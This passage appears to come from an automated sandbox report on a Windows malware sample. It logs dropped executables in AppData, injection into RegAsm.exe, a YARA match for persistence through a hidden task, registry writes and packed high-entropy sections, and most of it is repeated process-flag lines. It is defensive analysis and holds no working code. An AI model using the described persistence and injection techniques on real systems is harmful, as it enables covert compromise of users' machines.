Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00428E7D push esi; ret	3_2_00428E86
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004076E0 push ecx; ret	3_2_004076F3
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_0556CF82 push eax; iretd	4_2_0556CF89
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_055779E8 pushfd ; iretd	4_2_05577B1D
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_05599F75 push ebx; iretd	4_2_05599F92
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_05599F8D push ebx; iretd	4_2_05599F92
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_05E9E8FF push es; ret	4_2_05E9E900
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_06743DC7 push edx; ret	4_2_06743DCB
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_067A0F94 push 8BFFFFFEh; retf	4_2_067A0F9C
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_067A4880 push eax; retf	4_2_067A4881
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_067C20FD push es; iretd	4_2_067C2114
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_067C3133 push es; retf	4_2_067C3138
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_067D0776 push ecx; iretd	4_2_067D0783
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_067D87BD push es; ret	4_2_067D87D4
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_067D953F push es; ret	4_2_067D9540
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Code function: 5_2_00007FFD34917C5E push eax; retf	5_2_00007FFD34917C6D
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Code function: 5_2_00007FFD34917C2E pushad ; retf	5_2_00007FFD34917C5D
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Code function: 5_2_00007FFD34915C30 pushad ; retf	5_2_00007FFD34915C31
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Code function: 5_2_00007FFD34912B86 push cs; iretd	5_2_00007FFD34912C9F
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Code function: 5_2_00007FFD34913FC5 push edi; iretd	5_2_00007FFD34913FC6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00007FFD3465D2A5 pushad ; iretd	6_2_00007FFD3465D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00007FFD347784FA push ebx; retn 000Ah	6_2_00007FFD347785AA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00007FFD347785FA push ebx; retn 000Ah	6_2_00007FFD3477863A

Source: PT54FFSL7ET46RASB.exe	Static PE information: section name: .text entropy: 7.99955051552786
Source: HPd7I3vQri.exe.3.dr	Static PE information: section name: .text entropy: 7.870067595402444
Source: yTRfYxWiym.exe.3.dr	Static PE information: section name: .text entropy: 7.959305548795795

Persistence and Installation Behavior

Yara detected PersistenceViaHiddenTask

Source: Yara match	File source: 00000005.00000002.2204489074.000002EAE7913000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: yTRfYxWiym.exe PID: 764, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Current.exe PID: 3060, type: MEMORYSTR

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	File created: C:\Users\user\AppData\Roaming\l6E.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	File created: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Jump to dropped file

Boot Survival

Yara detected PersistenceViaHiddenTask

Source: Yara match	File source: 00000005.00000002.2204489074.000002EAE7913000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: yTRfYxWiym.exe PID: 764, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Current.exe PID: 3060, type: MEMORYSTR

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Jump to behavior

Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe

Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\3D990C7731BF66406F05FEE36BA53646 93b21885452761d5418e7b08ca003661

Jump to behavior

Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
